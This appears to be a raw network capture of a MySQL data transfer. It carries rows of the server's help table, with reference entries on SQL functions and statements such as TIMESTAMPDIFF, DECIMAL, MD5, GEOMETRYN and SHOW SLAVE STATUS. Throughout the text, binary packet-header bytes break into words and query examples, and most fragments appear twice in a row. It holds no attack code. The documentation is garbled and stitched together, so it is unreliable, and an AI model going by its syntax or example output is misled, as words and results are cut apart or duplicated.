TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if it is not.\n','mysql> SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsTC_bb0`BiET@/Ԁo0SE<'@@TP  3Pğu}U O ) [OR REPLACE] [ALGORITHM = {UNDEFINED | MERGE | TEMPTABLE}]\n VIEW view_name [(column_list)]\n AS select_statement\n [WITH [CASCADED | LOCAL] CHECK OPTION]',''),(153,'TIMESTAMPDIFF FUNCTION',14,'','mysql> SELECT TIMESTAMPDIFF(MONTH,\'2003-02-01\',\'2003-05-01\');\n -> 3\nmysql> SELECT TIMESTAMPDIFF(YEAR,\'2002-05-01\',\'2001-01-01\');\n -> -1',''),(154,'CRC32',4,' CRC32(expr)\nComputes a cyclic redundancy check value and returns a 32-bit unsigned value.\nThe result is NULL if the argument is NULL.\nThe argument is expected be a string and is treated as one if it is not.\n','mysql> SELECT CRC32(\'MySQL\');\n -> 3259397556',''),(155,'XOR',20,' XOR\nLogical XOR.\nReturns NULL if either operand is NULL.\nFor non-NULL operands, evaluates to 1 if an odd number\nof operands is non-zero,\notherwise 0 is returned.\n','mysql> SELECT 1 XOR 1;\n -> 0\nmysql> SELECT 1 XOR 0;\n -> 1\nmysql> SELECT 1 XOR NULL;\n -> NULL\nmysql> SELECT 1 XOR 1 XOR 1;\n -> 1',''),(156,'STARTPOINT',18,' StartPoint(ls)\nReturns the Point that is the start point of the LineString value\nls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(StartPoint(GeomFromText(@ls)));\n+---------------------------------------+\n| AsTCaZZBi0`EL@/܂Sŀo0E4˚@?Y 3 9PZ )yeC'aZZ0`BiEL@/Eo0lE4˚@@X 3 9PZ )yeC cZZBi0`EL@/܂Sŀo0E4\1@?N 3 Pu}U$ )-CcZZ0`BiEL@/go0AE4\1@@N 3 Pu}U$ )-CdbbBi0`ET@/p܂Ao0E<(@?UO  3P̟u}U 6 )ext(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(160,'YEARWEEK',14,' YEARWEEK(date)\n YEARWEEK(date,start)\nReturns year and week for a date. The start argument works exactly\nlike the start argument to WEEK(). The year in the\nresult may be\ndifferent from the year in the date argument for the first and the last\nweek of the year.\n','mysql> SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturns the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100)Cdbb0`BiET@/Ԁo0SE<(@@TO  3P̟u}U 6 )ext(StartPoint(GeomFromText(@ls))) |\n+---------------------------------------+\n| POINT(1 1) |\n+---------------------------------------+',''),(157,'MPOLYFROMTEXT',3,' MPolyFromText(wkt[,srid])\n MultiPolygonFromText(wkt[,srid])\nConstructs a MULTIPOLYGON value using its WKT representation and SRID.\n','',''),(158,'MBRINTERSECTS',8,' MBRIntersects(g1,g2)\nReturns 1 or 0 to indicate whether or not the Minimum Bounding Rectangles of\nthe two geometries g1 and g2 intersect.\n','',''),(159,'BIT_OR',12,' BIT_OR(expr)\nReturns the bitwise OR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(160,'YEARWEEK',14,' YEARWEEK(date)\n YEARWEEK(date,start)\nReturns year and week for a date. The start argument works exactly\nlike the start argument to WEEK(). The year in the\nresult may be\ndifferent from the year in the date argument for the first and the last\nweek of the year.\n','mysql> SELECT YEARWEEK(\'1987-01-01\');\n -> 198653',''),(161,'NOT BETWEEN',26,' expr NOT BETWEEN min AND max\nThis is the same as NOT (expr BETWEEN min AND max).\n','',''),(162,'LOG10',4,' LOG10(X)\nReturns the base-10 logarithm of X.\n','mysql> SELECT LOG10(2);\n -> 0.301030\nmysql> SELECT LOG10(100)CeZZBi0`EL@/$T<o0E4x@?  mPͮ1g W~7=w C fZZʪBiEL@/o0o0oE4x@@  mPͮ1g W~7=w CcibbBi0`ET@/p܂Ao0E<)@?UN  3Pԟu}U OM );\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. The maximum number of digits\n(M) for DECIMAL is 64. The maximum number of supported\ndecimals (D) is 30. If UNSIGNED is specified, negative\nvalues are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nAll basic calculations (+, -, *, /) with DECIMAL columns are\ndone with a precision of 64 decimal digits.\n\nBefore MySQL 5.0.3:\n\nAn unpacked fixed-point number. Behaves like a CHAR column;\n``unpacked\'\' means the number is stored as a string, using one character for\neach digit of the value. M is the total number of digits and\nD is the number of decimals. The decimal point and (for negative\nnumbers) the \'-\' sign are not counted in M, alCvibb0`BiET@/Ԁo0SE<)@@TN  3Pԟu}U OM );\n -> 2.000000\nmysql> SELECT LOG10(-100);\n -> NULL',''),(163,'SQRT',4,' SQRT(X)\nReturns the non-negative square root of X.\n','mysql> SELECT SQRT(4);\n -> 2.000000\nmysql> SELECT SQRT(20);\n -> 4.472136',''),(164,'DECIMAL',1,' DECIMAL[(M[,D])] [UNSIGNED] [ZEROFILL]\n\n\nFor MySQL 5.0.3 and above:\n\nA packed ``exact\'\' fixed-point number. M is the total number of\ndigits and D is the number of decimals. The decimal point and\n(for negative numbers) the \'-\' sign are not counted in M.\nIf D is 0, values have no\ndecimal point or fractional part. The maximum number of digits\n(M) for DECIMAL is 64. The maximum number of supported\ndecimals (D) is 30. If UNSIGNED is specified, negative\nvalues are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nAll basic calculations (+, -, *, /) with DECIMAL columns are\ndone with a precision of 64 decimal digits.\n\nBefore MySQL 5.0.3:\n\nAn unpacked fixed-point number. Behaves like a CHAR column;\n``unpacked\'\' means the number is stored as a string, using one character for\neach digit of the value. M is the total number of digits and\nD is the number of decimals. The decimal point and (for negative\nnumbers) the \'-\' sign are not counted in M, alCJmbbBi0`ET@/p܂Ao0E<*@?UM  3Pܟu}U 8P )though space for\nthem is reserved. If D is 0, values have no decimal point or\nfractional part. The maximum range of DECIMAL values is the same as\nfor DOUBLE, but the actual range for a given DECIMAL column\nmay be constrained by the choice of M and D. If\nUNSIGNED is specified, negative values are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nBefore MySQL 3.23:\n\nAs just described, with the exception that the M value must be large\nenough to include the space needed for the sign and the decimal point\ncharacters.\n\n DEC[(M[,D])] [UNSIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+----------------------------------------+\n| POINT(1 1) |\n+---------------------C]mbb0`BiET@/Ԁo0SE<*@@TM  3Pܟu}U 8P )though space for\nthem is reserved. If D is 0, values have no decimal point or\nfractional part. The maximum range of DECIMAL values is the same as\nfor DOUBLE, but the actual range for a given DECIMAL column\nmay be constrained by the choice of M and D. If\nUNSIGNED is specified, negative values are disallowed.\n\nIf D is omitted, the default is 0. If M is omitted, the\ndefault is 10.\n\nBefore MySQL 3.23:\n\nAs just described, with the exception that the M value must be large\nenough to include the space needed for the sign and the decimal point\ncharacters.\n\n DEC[(M[,D])] [UNSIGNED] [ZEROFILL]\n NUMERIC[(M[,D])] [UNSIGNED] [ZEROFILL]\n FIXED[(M[,D])] [UNSIGNED] [ZEROFILL]\n\nThese are synonyms for DECIMAL. The FIXED synonym was added\nin MySQL 4.1.0 for compatibility with other servers.\n','',''),(165,'GEOMETRYN',5,' GeometryN(gc,n)\nReturns the n-th geometry in the GeometryCollection value\ngc. Geometry numbers begin at 1.\n','mysql> SET @gc = \'GeometryCollection(Point(1 1),LineString(2 2, 3 3))\';\nmysql> SELECT AsText(GeometryN(GeomFromText(@gc),1));\n+----------------------------------------+\n| AsText(GeometryN(GeomFromText(@gc),1)) |\n+----------------------------------------+\n| POINT(1 1) |\n+---------------------CDnZZBi0`EL@/$T<o0E4x@?  mPͮd W~7=w CUnZZʪBiEL@/o0o0oE4x@@  mPͮd W~7=w CoZZBiʪEL@/o0oo0E4@@C Pm΀dW 7=wW~CoZZ0`BiEL@/To0<E4@@C Pm΀dW 7=wW~CqbbBi0`ET@/p܂Ao0E<+@?UL  3Pu}U  )-------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER privilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULL.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n CqZZBi0`EL@/܂Sŀo0E4\3@?L 3 Pu}U$ ) /CqZZBi0`EL@/$T<o0E4q@?@  PX\|  ^n~Cqbb0`BiET@/Ԁo0SE<+@@TL  3Pu}U  )-------------------+',''),(166,'CREATE INDEX',28,'In MySQL 3.22 or later, CREATE INDEX is mapped to an\nALTER TABLE statement to create indexes.\nSee also : [ALTER TABLE, , ALTER TABLE].\nThe CREATE INDEX statement doesn\'t do anything prior\nto MySQL 3.22.\n','CREATE [UNIQUE|FULLTEXT|SPATIAL] INDEX index_name\n [USING index_type]\n ON tbl_name (index_col_name,...)\n\nindex_col_name:\n col_name [(length)] [ASC | DESC]',''),(167,'ALTER DATABASE',28,'\nALTER DATABASE allows you to change the overall characteristics of a\ndatabase. These characteristics are stored in the *db.opt file in the\ndatabase directory.\nTo use ALTER DATABASE, you need the ALTER privilege on the\ndatabase.\n','ALTER {DATABASE | SCHEMA} [db_name]\n alter_specification [, alter_specification] ...\n\nalter_specification:\n [DEFAULT] CHARACTER SET charset_name\n | [DEFAULT] COLLATE collation_name',''),(168,'<<',27,'Shifts a longlong (BIGINT) number to the left.\n <<\n','mysql> SELECT 1 << 2;\n -> 4',''),(169,'MD5',17,' MD5(str)\nCalculates an MD5 128-bit checksum for the string. The value is returned\nas a binary string of 32 hex digits,\nor NULL if the argument was NULL.\nThe return value can, for example, be used as a hash key.\n','mysql> SELECT MD5(\'testing\');\n CqZZ0`BiEL@/go0AE4\3@@L 3 Pu}U$ ) /CqZZ0`BiEL@/o0AE4q@@@  PX\|  ^n~CvbbBi0`ET@/p܂Ao0E<,@?UK  3Pu}U  ) -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10-04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n','mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer divCvbbBi0`ET@/$L<o0E<@?  nPxC W~C)vbb0`BiET@/Ԁo0SE<,@@TK  3Pu}U  ) -> \'ae2b1fca515949e5d54fb22b8ed95575\'',''),(170,'<',26,' <\nLess than:\n','mysql> SELECT 2 < 2;\n -> 0',''),(171,'UNIX_TIMESTAMP',14,' UNIX_TIMESTAMP()\n UNIX_TIMESTAMP(date)\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' GMT) as an unsigned integer. If\nUNIX_TIMESTAMP() is called with a date argument, it\nreturns the value of the argument as seconds since \'1970-01-01\n00:00:00\' GMT. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format\nYYMMDD or YYYYMMDD in local time.\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 882226357\nmysql> SELECT UNIX_TIMESTAMP(\'1997-10-04 22:23:00\');\n -> 875996580',''),(172,'DAYOFMONTH',14,' DAYOFMONTH(date)\nReturns the day of the month for date, in the range 1 to\n31.\n','mysql> SELECT DAYOFMONTH(\'1998-02-03\');\n -> 3',''),(173,'ASCII',23,' ASCII(str)\nReturns the numeric value of the leftmost character of the string\nstr. Returns 0 if str is the empty string. Returns\nNULL if str is NULL.\nASCII() works for characters with numeric values from 0 to\n255.\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100',''),(174,'DIV',4,'Integer divC SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue this statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHOW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: YCzbb0`BiET@/Ԁo0SE<-@@TJ  3Pu}U  )ision.\nSimilar to FLOOR() but safe with BIGINT values.\n','mysql> SELECT 5 DIV 2;\n -> 2',''),(175,'RENAME USER',7,'The RENAME USER statement renames existing MySQL accounts.\nTo use it, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database.\nAn error occurs if any old account does not exist or any new\naccount exists. The old_user and new_user values are given the\nsame way as for the GRANT statement.\n','RENAME USER old_user TO new_user\n [, old_user TO new_user] ...',''),(176,'SHOW SLAVE STATUS',7,'SHOW SLAVE STATUS\n\nProvides status information on\nessential parameters of the slave threads. If you issue this statement using\nthe\nmysql client, you can use a \\G statement terminator rather than\nsemicolon to get a more readable vertical layout:\n\nmysql> SHOW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relay-bin.005\n Relay_Log_Pos: 548\nRelay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: YC~bbBi0`ET@/p܂Ao0E<.@?UI  3Pu}U B )es\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyISAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the number of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECT 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALC~bb0`BiET@/Ԁo0SE<.@@TI  3Pu}U B )es\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\nSeconds_Behind_Master: 8\n','',''),(177,'GEOMETRY',24,'MySQL provides a standard way of creating spatial columns for\ngeometry types, for example, with CREATE TABLE or ALTER TABLE.\nCurrently, spatial columns are supported only for MyISAM tables.\n','mysql> CREATE TABLE geom (g GEOMETRY);\nQuery OK, 0 rows affected (0.02 sec)',''),(178,'NUMPOINTS',18,' NumPoints(ls)\nReturns the number of points in the LineString value ls.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+',''),(179,'&',27,' &\nBitwise AND:\n','mysql> SELECT 29 & 15;\n -> 13',''),(180,'LOCALTIMESTAMP',14,' LOCALTIMESTAMP\n LOCALTIMESTAMP()\n\nLOCALCbbBi0`ET@/p܂Ao0E SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byte code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a mulCbb0`BiET@/Ԁo0SE SELECT DATE_ADD(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\nmysql> SELECT ADDDATE(\'1998-01-02\', INTERVAL 31 DAY);\n -> \'1998-02-02\'\n\nAs of MySQL 4.1.1, the second syntax is allowed, where expr is a date\nor datetime expression and days is the number of days to be added to\nexpr.\n\nmysql> SELECT ADDDATE(\'1998-01-02\', 31);\n -> \'1998-02-02\'\n','',''),(182,'SMALLINT',1,' SMALLINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The\nunsigned range is 0 to 65535.\n','',''),(183,'ORD',23,' ORD(str)\nIf the leftmost character of the string str is a multi-byte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byte code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 256^2) ...\n\nIf the leftmost character is not a mulCZZBi0`EL@/܂Sŀo0E4@? 3 Pb커)v )!'CZZ0`BiEL@/go0AE4@@ 3 Pb커)v )!'CbbBi0`ET@/p܂Ao0E<0@?UG  3P u}U W, )ti-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined by the corner points of the bounding box:\n\nPOLYGON((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n','',''),(185,'IS_FREE_LOCK',21,' IS_FREE_LOCK(str)\nChecks whether the lock named str is free to use (that is, not locked).\nReturns 1 if the lock is free (no one is using the lock),\n0 if the lock is in use, and\nNULL on errors (such as incorrect arguments).\n','',''),(186,'SHOW BINLOG',6,'SHOW BINLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in the binary log.\nIf you do not specify \'log_name\', the first binary log is displayed.\n','',''),(187,'TOUC$bb0`BiET@/Ԁo0SE<0@@TG  3P u}U W, )ti-byte character, ORD()\nreturns the same value as the ASCII() function.\n','mysql> SELECT ORD(\'2\');\n -> 50',''),(184,'ENVELOPE',19,' Envelope(g)\nReturns the Minimum Bounding Rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value.\n\nmysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n\nThe polygon is defined by the corner points of the bounding box:\n\nPOLYGON((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n','',''),(185,'IS_FREE_LOCK',21,' IS_FREE_LOCK(str)\nChecks whether the lock named str is free to use (that is, not locked).\nReturns 1 if the lock is free (no one is using the lock),\n0 if the lock is in use, and\nNULL on errors (such as incorrect arguments).\n','',''),(186,'SHOW BINLOG',6,'SHOW BINLOG EVENTS\n [IN \'log_name\'] [FROM pos] [LIMIT [offset,] row_count]\n\nShows the events in the binary log.\nIf you do not specify \'log_name\', the first binary log is displayed.\n','',''),(187,'TOUCbbBi0`ET@/p܂Ao0E<1@?UF  3Pu}U |! )CHES',11,' Touches(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially touches\ng2. Two geometries /spatially touch/ if the interiors of\nthe geometries do not intersect, but the boundary of one of the geometries\nintersects either the boundary or the interior of the other.\n','',''),(188,'TIMESTAMPADD FUNCTION',14,'','mysql> SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric value of the address.\nAddresses may be 4- or 8-byte addresses.\n','mysql> SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCREMENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRECbb0`BiET@/Ԁo0SE<1@@TF  3Pu}U |! )CHES',11,' Touches(g1,g2)\nReturns 1 or 0 to indicate whether or not g1 spatially touches\ng2. Two geometries /spatially touch/ if the interiors of\nthe geometries do not intersect, but the boundary of one of the geometries\nintersects either the boundary or the interior of the other.\n','',''),(188,'TIMESTAMPADD FUNCTION',14,'','mysql> SELECT TIMESTAMPADD(MINUTE,1,\'2003-01-02\');\n -> \'2003-01-02 00:01:00\'\nmysql> SELECT TIMESTAMPADD(WEEK,1,\'2003-01-02\');\n -> \'2003-01-09\'',''),(189,'INET_ATON',21,' INET_ATON(expr)\nGiven the dotted-quad representation of a network address as a string,\nreturns an integer that represents the numeric value of the address.\nAddresses may be 4- or 8-byte addresses.\n','mysql> SELECT INET_ATON(\'209.207.224.40\');\n -> 3520061480',''),(190,'AUTO_INCREMENT',1,'The AUTO_INCREMENT attribute can be used to generate a unique\nidentity for new rows:\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n );\nINSERT INTO animals (name) VALUES (\'dog\'),(\'cat\'),(\'penguin\'),\n (\'lax\'),(\'whale\'),(\'ostrich\');\nSELECT * FROM animals;',''),(191,'UNCOMPRESS',23,' UNCOMPRECbbBi0`ET@/p܂Ao0E<2@?UE  3Pu}U  )SS(string_to_uncompress)\nUncompresses a string compressed by the COMPRESS() function.\nIf the argument is not a compressed value, the result is NULL.\nThis function requires MySQL to have been compiled with a compression library\nsuch as zlib. Otherwise, the return value is always NULL.\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL',''),(192,'ISSIMPLE',19,' IsSimple(g)\n\nCurrently, this function is a placeholder and should not be used.\nIf implemented, its behavior will be as described in the next paragraph.\n\nReturns 1 if the geometry value g has no anomalous geometric points,\nsuch as self-intersection or self-tangency. IsSimple() returns 0 if the\nargument is not simple, and -1 if it is NULL.\n\nThe description of each instantiable geometric class given earlier in\nthe chapter includes the specific conditions that cause an instance of\nthat class to be classified as not simple.\n','',''),(193,'- BINARY',4,' -\nSubtraction:\n','mysql> SELECT 3-5;\n -> -2',''),(194,'GEOMCOLLFROMTEXT',3,' GeomCollFromText(wkt[,srid])\n GeometryCollectionFromText(wkt[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKT representation and SRID.\n','',''),(195,'WKT DCZZBi0`EL@/܂Sŀo0E4\"@?\ 3 P{Zr"l )"^lC bb0`BiET@/Ԁo0SE<2@@TE  3Pu}U  